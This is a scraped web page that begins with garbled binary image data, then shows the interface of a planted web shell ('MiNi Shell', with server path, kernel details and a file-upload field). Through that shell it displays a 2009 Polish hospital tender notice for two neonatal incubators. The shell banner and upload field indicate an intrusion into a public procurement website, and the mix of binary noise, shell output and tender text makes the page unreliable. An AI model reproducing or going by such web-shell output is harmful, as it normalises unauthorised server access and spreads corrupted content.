JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090717/114119-N-2009.html

<p class="kh_header"><b>Włocławek: DIZ 37-2009 - na dostawę inkubatorów zamkniętych z monitorem transportowym - sztuk 2</b><br>
<b>Numer ogłoszenia: 114119 - 2009; data zamieszczenia: 17.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wloclawek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ 37-2009 - na dostawę inkubatorów zamkniętych z monitorem transportowym - sztuk 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pomiar dwóch temperatur: temperatury powietrza i temperatury ciała; czujniki wielorazowe pomiaru temperatury ciała .
Szyny umożliwiające mocowanie akcesoriów.
Szuflada na akcesoria, przybory pielęgnacyjne, minimum jedna.
Monitor czynności życiowych pacjenta przenośny o uniwersalnym zastosowaniu z uchwytem do przenoszenia. Zainstalowany na inkubatorze.
Ekran monitora kolorowy, pojedynczy, w technologii aktywnej matrycy TFT,  o przekątnej ekranu minimum 10, umożliwiający jednoczesny pomiar i wyświetlanie min. 5 krzywych
Długość materacyka min. 65 cm
-Możliwość regulacji kąta nachylenia materacyka w zakresie min. +/-12 stopni,
-Możliwość wprowadzenia kasety rtg bez konieczności ruszania noworodka
-Konstrukcja umożliwiająca obracanie podstawy materacyka o 360°.
-Możliwość wysunięcia materacyka na zewnątrz
-Podwójne ścianki inkubatora
-Hałas we wnętrzu inkubatora nie większy niż 49dB
-Kurtyna ciepłego powietrza zapobiegająca wychłodzeniu wnętrza po otwarciu
-Nawilżanie powietrza, automatyczna regulacja nawilżania (zakres regulacji do min.90%). Pojemność zbiornika nawilżacza min. 1000 ml., zbiornik wbudowany w inkubator.
-Automatyczna regulacja temperatury powietrza
-Automatyczne utrzymanie zadanej temperatury skóry dziecka w zakresie min.35 -37,5stopnia C
-Zakres regulacji temperatury powietrza min. od 20 do 39 stopni C
-Automatyczne utrzymanie zadanych wartości stężenia tlenu.
-Alarmy akustyczne i optyczne: - przekroczenia nastawionej temperatury w powietrzu - przekroczenia ustawionej temperatury na skórze - alarm zakłócenia w przepływie wewnętrznym powietrza - alarm uszkodzenia lub braku połączenia czujników temperatury, - alarm zaniku napięcia zasilającego, - alarm uszkodzenie grzałki
-Zasilanie 230V,50Hz ? 10%
-Hamulce minimum 2 kół
-Zintegrowana waga elektroniczna
-Możliwość regulacji wysokości inkubatora. Winda sterowana elektrycznie.
 -Sposób obsługi monitora poprzez pokrętło, klawisze funkcyjne oraz menu w języku polskim możliwość wyświetlania dużych pól z mierzonymi wartościami numerycznymi
-Zasilanie sieciowe 220-230V 50/60 Hz
-Zasilanie z wbudowanego akumulatora - min. 3 godziny ciągłej pracy
-Możliwość dostosowania koloru krzywych do indywidualnych preferencji użytkownika
-Wszystkie mierzone parametry, alarmy i nastawy dla różnych kategorii wiekowych (dorośli, dzieci i noworodki)
-Min. 4 stopniowe alarmy monitorowanych parametrów rozróżniane kolorem oraz tonem
-Min. 2 stopnie wyciszania alarmów.
-Waga max. 5,5 kg

-Trendy graficzne i numeryczne min. 24 godzinne o rozdzielczości min. 1 min. Przywołanie danych poprzedniego pacjenta po jego zwolnieniu
-Historia alarmów pacjenta min. 200
-EKG 
-Rejestracja odprowadzeń: I, II, III, aVR, AVL, AVF, VA Wykrywanie rozrusznika serca ustawiane ręcznie.
-Zabezpieczenie przed impulsem defibrylacyjnym.
-Zakres pomiarowy min. 30 - 300 ud/min.
-Kable połączeniowe i kable pacjenta 5 odprowadzeniowe
-Analiza arytmii w zakresie podstawowym, alarmy arytmii zagrażającym życiu.
-Respiracja
-Prezentacja cyfrowa oraz krzywa dynamiczna.
-Pomiar oddechu metodą impedancyjną min. 8 -120 odd./min.
-Możliwość wyboru progu zliczania oddechów oraz odprowadzenia do pomiaru respiracji.
-Nieinwazyjny pomiar ciśnienia krwi
-Metoda oscylometryczna z algorytmem odpornym na artefakty ruchowe, testowanym na oddziałach noworodkowych i geriatrycznych.
-Zakres pomiarowy min. 10-280 mmHg. 
-Prezentacja wartości: skurczowej, rozkurczowej oraz średniej-alarmy dla każdej wartości. 
-Automatyczne dopasowanie ciśnienia inflacji mankietu pod kątem komfortu pacjenta i dokładności pomiarów.
-Pomiar saturacji
-Prezentacja wyniku pomiaru w postaci numerycznej oraz krzywej pletyzmograficznej. 
-Zakres pomiarowy: min. 10 - 100%
-Zakres pomiarowy pulsu: 
min. 25 - 240 ud./min.
-Algorytm odporny na niską perfuzję i artefakty ruchowe.
-Pomiar temperatury
-Pomiar temperatury centralnej
-Rejestrator termiczny
-Urządzenie parowe do dezynfekcji inkubatora
-Laryngoskop z kompletem łopatek noworodkowych ze światłowodowym źródłem światła
-Instrukcja obsługi w języku polskim (wraz z dostawą)
-Instalacja i uruchomienie urządzeń.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.15.20.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	spełniają wymagania określone w Specyfikacji Istotnych Warunków Zamówienia.
2.	spełniają warunki określone w art. 22 ust.1 ustawy tj.
	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
-    warunek odpis z Krajowego Rejestru Sądowego lub wpisu do Ewidencji Działalności Go-spodarczej.
ocena na zasadzie: spełnia / nie spełnia
	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiązanie in-nych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykona-nia zamówienia,
ocena na zasadzie: spełnia / nie spełnia  
- warunek załączenia oświadczenia w/g załącznika nr.2
	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
ocena na zasadzie: spełnia / nie spełnia
- warunek załączenia oświadczenia w/g załącznika nr.2
	nie podlega wykluczeniu z postępowania o udzielenie zamówienia
ocena na zasadzie: spełnia / nie spełnia

3.	akceptują treść projektu umowy stanowiącego Załącznik nr 5 do SIWZ
4.	załączą oświadczenia i dokumenty przewidziane w Rozdziale VI SIWZ.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. aktualny odpis z właściwego rejestru, albo zaświadczenie o wpisie do ewidencji  działalności 
   gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert;
2. wypełniony i podpisany Druk ofertowy, zgodnie z Załącznikiem nr 1 do niniejszej  
    specyfikacji;
4. oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z Załącznikiem nr 2 
   do niniejszej specyfikacji;
5. oświadczenie o zapoznaniu się z niektórymi przepisami, zgodnie z Załącznikiem nr 3 do    
    niniejszej specyfikacji;
6. oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia, zgodnie z  
    Załącznikiem nr 4 ;
7. zaakceptowany i podpisany projekt umowy stanowiący Załącznik nr 5 do niniejszej   specyfikacji;
8. wykaz wykonanych dostaw podobnego sprzętu medycznego dla placówek ochrony zdrowia, zgodnie 
    z Załącznikiem nr 6  do niniejszej specyfikacji;
9. oświadczenia, że wszystkie oferowane artykuły  spełniają wymogi określone ustawą z 
     dnia  20.04.2004r. o wyrobach medycznych ( Dz. U . z 2004r.,Nr 93, poz.896 ).
10. pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów    
      rejestracyjnych)  w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów 
      rejestracyjnych ;  


11. Dowód uzyskania wpisu oferowanego sprzętu do rejestru wyrobów medycznych - zgodnie z art. 52 i 
     54 ustawy z dnia 20 kwietnia 2004 roku o wyrobach medycznych (Dz.U. Nr 93, poz. 896 ze zm.)

12.	Wykaz wykonanych dostaw sprzętu medycznego , w tym inkubatorów dla placówek ochrony zdro-wia, wraz z załączeniem dokumentów potwierdzających, że  wykazane dostawy wykonane z należytą starannością , zgodnie z Załącznikiem nr 6 do niniejszej specyfikacji wykazanie ( w okresie ostatnich 3 lat, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, przed dniem wszczęcia postępowania co najmniej jednej dostawy o charakterze i złożoności porównywalnej z przedmiotem zamówienia (wartość dostawy min. 200 000,00 brutto)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.szpital.wloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki we Włocławku
 ul. Wieniecka 49
87-800 Włocławek
 (budynek  administracji, pokój 303).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2009 godzina 10:00, miejsce: Szpital Wojewódzki we Włocławku
 ul. Wieniecka 49
87-800 Włocławek
 (budynek  administracji, pokój 303).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com